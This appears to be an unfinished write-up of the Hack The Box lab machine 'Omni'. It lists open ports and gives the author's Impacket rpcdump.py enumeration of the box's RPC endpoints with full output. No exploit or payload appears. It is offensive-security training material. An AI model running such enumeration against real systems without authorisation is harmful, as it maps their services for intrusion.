Tracker

  • User
  • root

Summary

Overview/Highlights

OS: Windows

OS Version:

DNS Hostname:

Solution

Enumeration

Open Ports

msrpc on tcp/135 upnp on tcp/8080 upnp on tcp/5985 unknown on tcp/29817 arcserve on tcp/29819 unknown on tcp/29820

Manual Enumeration

First I should enumerate the RPC bindings I guess.

  \| \~/cybersecurity/htb/boxes/10.10.10.204-omni ······························ 11m 15s   17:11:32 ─╮ ❯ rpcdump.py 10.10.10.204 -p 135 ─╯ Impacket v0.9.22.dev1+20200909.150738.15f3df26 - Copyright 2020 SecureAuth Corporation   \[\*\] Retrieving endpoint list from 10.10.10.204 Protocol: \[MS-RSP\]: Remote Shutdown Protocol Provider: wininit.exe UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 Bindings: ncacn_ip_tcp:10.10.10.204\[49664\] ncalrpc:\[WindowsShutdown\] ncacn_np:\\\\omni\[\\PIPE\\InitShutdown\] ncalrpc:\[WMsgKRpc08ED50\]   Protocol: N/A Provider: winlogon.exe UUID : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 Bindings: ncalrpc:\[WindowsShutdown\] ncacn_np:\\\\omni\[\\PIPE\\InitShutdown\] ncalrpc:\[WMsgKRpc08ED50\]   Protocol: N/A Provider: N/A UUID : FC48CD89-98D6-4628-9839-86F7A3E4161A v1.0 Bindings: ncalrpc:\[OLE33C7A3B4DE9C1ACF9BDFF5DEB9AD\] ncalrpc:\[dabrpc\] ncalrpc:\[csebpub\] ncalrpc:\[LRPC-bf76ff6e327b981549\] ncalrpc:\[LRPC-2115b71adce31d513d\] ncalrpc:\[LRPC-aa6f06b11746548368\] ncalrpc:\[LRPC-96c569a0d6054bc5b7\] ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0 Bindings: ncalrpc:\[csebpub\] ncalrpc:\[LRPC-bf76ff6e327b981549\] ncalrpc:\[LRPC-2115b71adce31d513d\] ncalrpc:\[LRPC-aa6f06b11746548368\] ncalrpc:\[LRPC-96c569a0d6054bc5b7\] ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\] ncalrpc:\[LRPC-2115b71adce31d513d\] ncalrpc:\[LRPC-aa6f06b11746548368\] ncalrpc:\[LRPC-96c569a0d6054bc5b7\] ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\] ncalrpc:\[LRPC-aa6f06b11746548368\] ncalrpc:\[LRPC-96c569a0d6054bc5b7\] ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\] ncalrpc:\[LRPC-3b6284ac9e9f97822e\] ncalrpc:\[16f27144-6247-4068-802e-acf135e9cce6\] ncalrpc:\[LRPC-ac03953e509d71d087\] ncalrpc:\[dhcpcsvc6\] ncalrpc:\[dhcpcsvc\] ncacn_ip_tcp:10.10.10.204\[49665\] ncacn_np:\\\\omni\[\\pipe\\eventlog\] ncalrpc:\[eventlog\] ncalrpc:\[LRPC-39000135c107cfc6d9\] ncalrpc:\[LRPC-13ac12dd138b864e6b\] ncalrpc:\[LRPC-aef4e8564f5f421448\] ncalrpc:\[LRPC-a4e3c0b64be931f4a3\] ncalrpc:\[LRPC-03f34133436c1d92ee\] ncalrpc:\[OLE1D1AD2662F277601A42B8A536486\] ncalrpc:\[LRPC-567b8ab8b5352e18e9\]   Protocol: N/A Provider: N/A UUID : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0 Bindings: ncalrpc:\[LRPC-bf76ff6e327b981549\] ncalrpc:\[LRPC-2115b71adce31d513d\] ncalrpc:\[LRPC-aa6f06b11746548368\] ncalrpc:\[LRPC-96c569a0d6054bc5b7\] ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0 Bindings: ncalrpc:\[LRPC-2115b71adce31d513d\] ncalrpc:\[LRPC-aa6f06b11746548368\] ncalrpc:\[LRPC-96c569a0d6054bc5b7\] ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : DD59071B-3215-4C59-8481-972EDADC0F6A v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 0D47017B-B33B-46AD-9E18-FE96456C5078 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 95406F0B-B239-4318-91BB-CEA3A46FF0DC v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 4ED8ABCC-F1E2-438B-981F-BB0E8ABC010C v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 0FF1F646-13BB-400A-AB50-9A78F2B7A85A v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 6982A06E-5FE2-46B1-B39C-A2C545BFA069 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 082A3471-31B6-422A-B931-A54401960C62 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : FAE436B0-B864-4A87-9EDA-298547CD82F2 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : E53D94CA-7464-4839-B044-09A2FB8B3AE5 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 178D84BE-9291-4994-82C6-3F909ACA5A03 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 4DACE966-A243-4450-AE3F-9B7BCB5315B8 v2.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 1832BCF6-CAB8-41D4-85D2-C9410764F75A v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : C521FACF-09A9-42C5-B155-72388595CBF0 v0.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 2C7FD9CE-E706-4B40-B412-953107EF9BB0 v0.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 88ABCBC3-34EA-76AE-8215-767520655A23 v0.0 Bindings: ncalrpc:\[LRPC-96c569a0d6054bc5b7\] ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 76C217BC-C8B4-4201-A745-373AD9032B1A v1.0 Bindings: ncalrpc:\[LRPC-96c569a0d6054bc5b7\] ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 55E6B932-1979-45D6-90C5-7F6270724112 v1.0 Bindings: ncalrpc:\[LRPC-96c569a0d6054bc5b7\] ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 857FB1BE-084F-4FB5-B59C-4B2C4BE5F0CF v1.0 Bindings: ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : B8CADBAF-E84B-46B9-84F2-6F71C03F9E55 v1.0 Bindings: ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 20C40295-8DBA-48E6-AEBF-3E78EF3BB144 v1.0 Bindings: ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 2513BCBE-6CD4-4348-855E-7EFB3C336DD3 v1.0 Bindings: ncalrpc:\[LRPC-5b9aacbe756f6c3e59\] ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 0D3E2735-CEA0-4ECC-A9E2-41A2D81AED4E v1.0 Bindings: ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : C605F9FB-F0A3-4E2A-A073-73560F8D9E3E v1.0 Bindings: ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 1B37CA91-76B1-4F5E-A3C7-2ABFC61F2BB0 v1.0 Bindings: ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 8BFC3BE1-6DEF-4E2D-AF74-7C47CD0ADE4A v1.0 Bindings: ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 2D98A740-581D-41B9-AA0D-A88B9D5CE938 v1.0 Bindings: ncalrpc:\[LRPC-5a1000c406dddefe97\] ncalrpc:\[actkernel\] ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 0361AE94-0316-4C6C-8AD8-C594375800E2 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 5824833B-3C1A-4AD2-BDFD-C31D19E23ED2 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : BDAA0970-413B-4A3E-9E5D-F6DC9D7E0760 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 3B338D89-6CFA-44B8-847E-531531BC9992 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 8782D3B9-EBBD-4644-A3D8-E8725381919B v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 085B0334-E454-4D91-9B8C-4134F9E793F3 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : 4BEC6BB8-B5C2-4B6F-B2C1-5DA5CF92D0D9 v1.0 Bindings: ncalrpc:\[umpo\]   Protocol: N/A Provider: N/A UUID : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\\Server Bindings: ncalrpc:\[LRPC-1cb8b85948701de7d0\]   Protocol: N/A Provider: N/A UUID : 6770612B-B256-4B6E-891B-2FF9936755A1 v1.0 Bindings: ncalrpc:\[SmsRouterSvcRpc\]   Protocol: N/A Provider: N/A UUID : ACD792E4-5239-48B6-8BAF-7D0A79A64AC0 v0.0 Bindings: ncalrpc:\[SmsRouterSvcRpc\]   Protocol: N/A Provider: N/A UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0 Bindings: ncalrpc:\[LRPC-6cb9aac9faec29be76\] ncalrpc:\[LRPC-3b6284ac9e9f97822e\] ncalrpc:\[16f27144-6247-4068-802e-acf135e9cce6\] ncalrpc:\[LRPC-ac03953e509d71d087\] ncalrpc:\[dhcpcsvc6\] ncalrpc:\[dhcpcsvc\] ncacn_ip_tcp:10.10.10.204\[49665\] ncacn_np:\\\\omni\[\\pipe\\eventlog\] ncalrpc:\[eventlog\] ncalrpc:\[LRPC-39000135c107cfc6d9\]   Protocol: N/A Provider: N/A UUID : 3473DD4D-2E88-4006-9CBA-22570909DD10 v5.1 WinHttp Auto-Proxy Service Bindings: ncalrpc:\[16f27144-6247-4068-802e-acf135e9cce6\] ncalrpc:\[LRPC-ac03953e509d71d087\] ncalrpc:\[dhcpcsvc6\] ncalrpc:\[dhcpcsvc\] ncacn_ip_tcp:10.10.10.204\[49665\] ncacn_np:\\\\omni\[\\pipe\\eventlog\] ncalrpc:\[eventlog\] ncalrpc:\[LRPC-39000135c107cfc6d9\]   Protocol: N/A Provider: dhcpcsvc6.dll UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint Bindings: ncalrpc:\[dhcpcsvc6\] ncalrpc:\[dhcpcsvc\] ncacn_ip_tcp:10.10.10.204\[49665\] ncacn_np:\\\\omni\[\\pipe\\eventlog\] ncalrpc:\[eventlog\] ncalrpc:\[LRPC-39000135c107cfc6d9\]   Protocol: N/A Provider: dhcpcsvc.dll UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint Bindings: ncalrpc:\[dhcpcsvc\] ncacn_ip_tcp:10.10.10.204\[49665\] ncacn_np:\\\\omni\[\\pipe\\eventlog\] ncalrpc:\[eventlog\] ncalrpc:\[LRPC-39000135c107cfc6d9\]   Protocol: \[MS-EVEN6\]: EventLog Remoting Protocol Provider: wevtsvc.dll UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP Bindings: ncacn_ip_tcp:10.10.10.204\[49665\] ncacn_np:\\\\omni\[\\pipe\\eventlog\] ncalrpc:\[eventlog\] ncalrpc:\[LRPC-39000135c107cfc6d9\]   Protocol: N/A Provider: nrpsrv.dll UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint Bindings: ncalrpc:\[LRPC-39000135c107cfc6d9\]   Protocol: N/A Provider: N/A UUID : 266F33B4-C7C1-4BD1-8F52-DDB8F2214EB0 v1.0 Wlan Service LowPriv Bindings: ncalrpc:\[LRPC-517476da4a08ad91fa\] ncalrpc:\[LRPC-cc495dca8a2d36c50a\] ncalrpc:\[LRPC-4a10165196973d1011\] ncalrpc:\[LRPC-452d29f0facb4f85a1\] ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: wlansvc.dll UUID : 266F33B4-C7C1-4BD1-8F52-DDB8F2214EA9 v1.0 Wlan Service Bindings: ncalrpc:\[LRPC-517476da4a08ad91fa\] ncalrpc:\[LRPC-cc495dca8a2d36c50a\] ncalrpc:\[LRPC-4a10165196973d1011\] ncalrpc:\[LRPC-452d29f0facb4f85a1\] ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: sysmain.dll UUID : B58AA02E-2884-4E97-8176-4EE06D794184 v1.0 Bindings: ncalrpc:\[LRPC-cc495dca8a2d36c50a\] ncalrpc:\[LRPC-4a10165196973d1011\] ncalrpc:\[LRPC-452d29f0facb4f85a1\] ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: sysntfy.dll UUID : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name Bindings: ncalrpc:\[LRPC-4a10165196973d1011\] ncalrpc:\[LRPC-452d29f0facb4f85a1\] ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\] ncalrpc:\[IUserProfile2\] ncalrpc:\[OLED73C919F9DB3DE40524A9C491560\]   Protocol: N/A Provider: N/A UUID : DE2DAF3B-5C16-4613-B204-D810EE629D9E v1.0 Bindings: ncalrpc:\[LRPC-4a10165196973d1011\] ncalrpc:\[LRPC-452d29f0facb4f85a1\] ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: wlansvc.dll UUID : 25952C5D-7976-4AA1-A3CB-C35F7AE79D1B v1.1 Wireless Diagnostics Bindings: ncalrpc:\[LRPC-452d29f0facb4f85a1\] ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: N/A UUID : 9C56D792-0591-4431-8D1F-681BFD80E4C0 v1.0 Wwan Service Second Bindings: ncalrpc:\[LRPC-452d29f0facb4f85a1\] ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: N/A UUID : B4CB7611-AD0B-4C2D-B35F-FFE45785C709 v1.0 Wwan Service Bindings: ncalrpc:\[LRPC-452d29f0facb4f85a1\] ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: N/A UUID : E40F7B57-7A25-4CD3-A135-7F7D3DF9D16B v1.0 Network Connection Broker server endpoint Bindings: ncalrpc:\[LRPC-452d29f0facb4f85a1\] ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: N/A UUID : 880FD55E-43B9-11E0-B1A8-CF4EDFD72085 v1.0 KAPI Service endpoint Bindings: ncalrpc:\[LRPC-452d29f0facb4f85a1\] ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: N/A UUID : 97BE9507-17DA-4999-87D7-66C0B2D83CC7 v1.0 Bindings: ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: N/A UUID : DB2CE634-191D-42AF-A28C-16BE97924CA7 v1.0 Bindings: ncalrpc:\[OLE4160AFA8EC0DAD1E65CC52286666\] ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: N/A UUID : 5222821F-D5E2-4885-84F1-5F6185A0EC41 v1.0 Network Connection Broker server endpoint for NCB Reset module Bindings: ncalrpc:\[LRPC-00e4d05f44f260d4f7\] ncalrpc:\[LRPC-13ac12dd138b864e6b\]   Protocol: N/A Provider: N/A UUID : A4B8D482-80CE-40D6-934D-B22A01A44FE7 v1.0 LicenseManager Bindings: ncalrpc:\[LicenseServiceEndpoint\]   Protocol: N/A Provider: bthserv.dll UUID : 2ACB9D68-B434-4B3E-B966-E06B4B3A84CB v1.0 Bindings: ncalrpc:\[LRPC-76d765066ee1dbf1ae\] ncalrpc:\[LRPC-aef4e8564f5f421448\] ncalrpc:\[LRPC-a4e3c0b64be931f4a3\] ncalrpc:\[LRPC-03f34133436c1d92ee\] ncalrpc:\[OLE1D1AD2662F277601A42B8A536486\] ncalrpc:\[LRPC-567b8ab8b5352e18e9\]   Protocol: N/A Provider: N/A UUID : 5DEA026D-F999-40B1-A234-2164FD086783 v1.0 Bindings: ncalrpc:\[LRPC-a4e3c0b64be931f4a3\] ncalrpc:\[LRPC-03f34133436c1d92ee\] ncalrpc:\[OLE1D1AD2662F277601A42B8A536486\] ncalrpc:\[LRPC-567b8ab8b5352e18e9\]   Protocol: N/A Provider: N/A UUID : 0A533B58-0ED9-4085-B6E8-95795E147972 v1.0 Bindings: ncalrpc:\[LRPC-03f34133436c1d92ee\] ncalrpc:\[OLE1D1AD2662F277601A42B8A536486\] ncalrpc:\[LRPC-567b8ab8b5352e18e9\]   Protocol: N/A Provider: nsisvc.dll UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint Bindings: ncalrpc:\[LRPC-567b8ab8b5352e18e9\]   Protocol: N/A Provider: N/A UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli Bindings: ncalrpc:\[LRPC-7b9f787b785b29ebc9\] ncacn_np:\\\\omni\[\\PIPE\\srvsvc\] ncalrpc:\[TeredoControl\] ncalrpc:\[TeredoDiagnostics\] ncalrpc:\[LRPC-267818551eb7553be1\] ncalrpc:\[ubpmtaskhostchannel\] ncalrpc:\[DeviceSetupManager\] ncalrpc:\[IUserProfile2\] ncalrpc:\[OLED73C919F9DB3DE40524A9C491560\]   Protocol: N/A Provider: N/A UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli Bindings: ncalrpc:\[LRPC-7b9f787b785b29ebc9\] ncacn_np:\\\\omni\[\\PIPE\\srvsvc\] ncalrpc:\[TeredoControl\] ncalrpc:\[TeredoDiagnostics\] ncalrpc:\[LRPC-267818551eb7553be1\] ncalrpc:\[ubpmtaskhostchannel\] ncalrpc:\[DeviceSetupManager\] ncalrpc:\[IUserProfile2\] ncalrpc:\[OLED73C919F9DB3DE40524A9C491560\]   Protocol: N/A Provider: N/A UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service Bindings: ncalrpc:\[TeredoControl\] ncalrpc:\[TeredoDiagnostics\] ncalrpc:\[LRPC-267818551eb7553be1\] ncalrpc:\[ubpmtaskhostchannel\] ncalrpc:\[DeviceSetupManager\] ncalrpc:\[IUserProfile2\] ncalrpc:\[OLED73C919F9DB3DE40524A9C491560\]   Protocol: N/A Provider: srvsvc.dll UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service Bindings: ncalrpc:\[TeredoControl\] ncalrpc:\[TeredoDiagnostics\] ncalrpc:\[LRPC-267818551eb7553be1\] ncalrpc:\[ubpmtaskhostchannel\] ncalrpc:\[DeviceSetupManager\] ncalrpc:\[IUserProfile2\] ncalrpc:\[OLED73C919F9DB3DE40524A9C491560\]   Protocol: N/A Provider: iphlpsvc.dll UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint Bindings: ncalrpc:\[LRPC-267818551eb7553be1\] ncalrpc:\[ubpmtaskhostchannel\] ncalrpc:\[DeviceSetupManager\] ncalrpc:\[IUserProfile2\] ncalrpc:\[OLED73C919F9DB3DE40524A9C491560\] Protocol: N/A Provider: N/A UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 Bindings: ncalrpc:\[LRPC-267818551eb7553be1\] ncalrpc:\[ubpmtaskhostchannel\] ncalrpc:\[DeviceSetupManager\] ncalrpc:\[IUserProfile2\] ncalrpc:\[OLED73C919F9DB3DE40524A9C491560\]   Protocol: \[MS-TSCH\]: Task Scheduler Service Remoting Protocol Provider: schedsvc.dll UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 Bindings: ncalrpc:\[LRPC-267818551eb7553be1\] ncalrpc:\[ubpmtaskhostchannel\] ncalrpc:\[DeviceSetupManager\] ncalrpc:\[IUserProfile2\] ncalrpc:\[OLED73C919F9DB3DE40524A9C491560\]   Protocol: N/A Provider: N/A UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0 Bindings: ncalrpc:\[LRPC-267818551eb7553be1\] ncalrpc:\[ubpmtaskhostchannel\] ncalrpc:\[DeviceSetupManager\] ncalrpc:\[IUserProfile2\] ncalrpc:\[OLED73C919F9DB3DE40524A9C491560\]   Protocol: N/A Provider: schedsvc.dll UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 Bindings: ncalrpc:\[DeviceSetupManager\] ncalrpc:\[IUserProfile2\] ncalrpc:\[OLED73C919F9DB3DE40524A9C491560\]   Protocol: N/A Provider: N/A UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service Bindings: ncacn_np:\\\\omni\[\\PIPE\\wkssvc\] ncalrpc:\[DNSResolver\] ncalrpc:\[nlaapi\] ncalrpc:\[nlaplg\]   Protocol: N/A Provider: N/A UUID : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface Bindings: ncalrpc:\[DNSResolver\] ncalrpc:\[nlaapi\] ncalrpc:\[nlaplg\]   Protocol: N/A Provider: N/A UUID : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server Bindings: ncalrpc:\[DNSResolver\] ncalrpc:\[nlaapi\] ncalrpc:\[nlaplg\]   Protocol: N/A Provider: MPSSVC.dll UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs Bindings: ncalrpc:\[LRPC-454819669acd419d84\] ncalrpc:\[LRPC-bb214ebbce44299165\] ncalrpc:\[LRPC-89e35107b3d0d029aa\] ncalrpc:\[LRPC-51a0d897e5409995be\]   Protocol: N/A Provider: N/A UUID : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs Bindings: ncalrpc:\[LRPC-bb214ebbce44299165\] ncalrpc:\[LRPC-89e35107b3d0d029aa\] ncalrpc:\[LRPC-51a0d897e5409995be\]   Protocol: N/A Provider: MPSSVC.dll UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs Bindings: ncalrpc:\[LRPC-89e35107b3d0d029aa\] ncalrpc:\[LRPC-51a0d897e5409995be\]   Protocol: N/A Provider: BFE.DLL UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API Bindings: ncalrpc:\[LRPC-51a0d897e5409995be\]   Protocol: N/A Provider: N/A UUID : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0 Bindings: ncalrpc:\[LRPC-68b9c277aeb1c3c737\]   Protocol: N/A Provider: N/A UUID : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0 Bindings: ncalrpc:\[LRPC-68b9c277aeb1c3c737\]   Protocol: N/A Provider: N/A UUID : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0 Bindings: ncalrpc:\[LRPC-68b9c277aeb1c3c737\]   Protocol: N/A Provider: N/A UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0 Bindings: ncalrpc:\[LRPC-68b9c277aeb1c3c737\]   Protocol: N/A Provider: N/A UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0 Bindings: ncalrpc:\[LRPC-68b9c277aeb1c3c737\]   Protocol: N/A Provider: N/A UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0 Bindings: ncalrpc:\[LRPC-68b9c277aeb1c3c737\]   Protocol: \[MS-SCMR\]: Service Control Manager Remote Protocol Provider: services.exe UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 Bindings: ncacn_ip_tcp:10.10.10.204\[49666\]   Protocol: N/A Provider: N/A UUID : 98CD761E-E77D-41C8-A3C0-0FB756D90EC2 v1.0 Bindings: ncalrpc:\[LRPC-326cfc93c0a8761026\]   Protocol: N/A Provider: N/A UUID : D22895EF-AFF4-42C5-A5B2-B14466D34AB4 v1.0 Bindings: ncalrpc:\[LRPC-326cfc93c0a8761026\]   Protocol: N/A Provider: N/A UUID : E38F5360-8572-473E-B696-1B46873BEEAB v1.0 Bindings: ncalrpc:\[LRPC-326cfc93c0a8761026\]   Protocol: N/A Provider: N/A UUID : 95095EC8-32EA-4EB0-A3E2-041F97B36168 v1.0 Bindings: ncalrpc:\[LRPC-326cfc93c0a8761026\]   Protocol: N/A Provider: N/A UUID : FD8BE72B-A9CD-4B2C-A9CA-4DED242FBE4D v1.0 Bindings: ncalrpc:\[LRPC-326cfc93c0a8761026\]   Protocol: N/A Provider: N/A UUID : 4C9DBF19-D39E-4BB9-90EE-8F7179B20283 v1.0 Bindings: ncalrpc:\[LRPC-326cfc93c0a8761026\]   Protocol: N/A Provider: N/A UUID : C27F3C08-92BA-478C-B446-B419C4CEF0E2 v1.0 Bindings: ncalrpc:\[LRPC-22ee118b593814444c\]   Protocol: N/A Provider: N/A UUID : B1EF227E-DFA5-421E-82BB-67A6A129C496 v0.0 Bindings: ncalrpc:\[LRPC-be14dbed971780ee29\] ncalrpc:\[OLE9BC70C10BB559115E63C3B03753E\]   Protocol: N/A Provider: N/A UUID : 0FC77B1A-95D8-4A2E-A0C0-CFF54237462B v0.0 Bindings: ncalrpc:\[LRPC-be14dbed971780ee29\] ncalrpc:\[OLE9BC70C10BB559115E63C3B03753E\]   Protocol: N/A Provider: N/A UUID : 8EC21E98-B5CE-4916-A3D6-449FA428A007 v0.0 Bindings: ncalrpc:\[LRPC-be14dbed971780ee29\] ncalrpc:\[OLE9BC70C10BB559115E63C3B03753E\]   Protocol: N/A Provider: N/A UUID : 51A227AE-825B-41F2-B4A9-1AC9557A1018 v1.0 Ngc Pop Key Service Bindings: ncalrpc:\[samss lpc\] ncalrpc:\[SidKey Local End Point\] 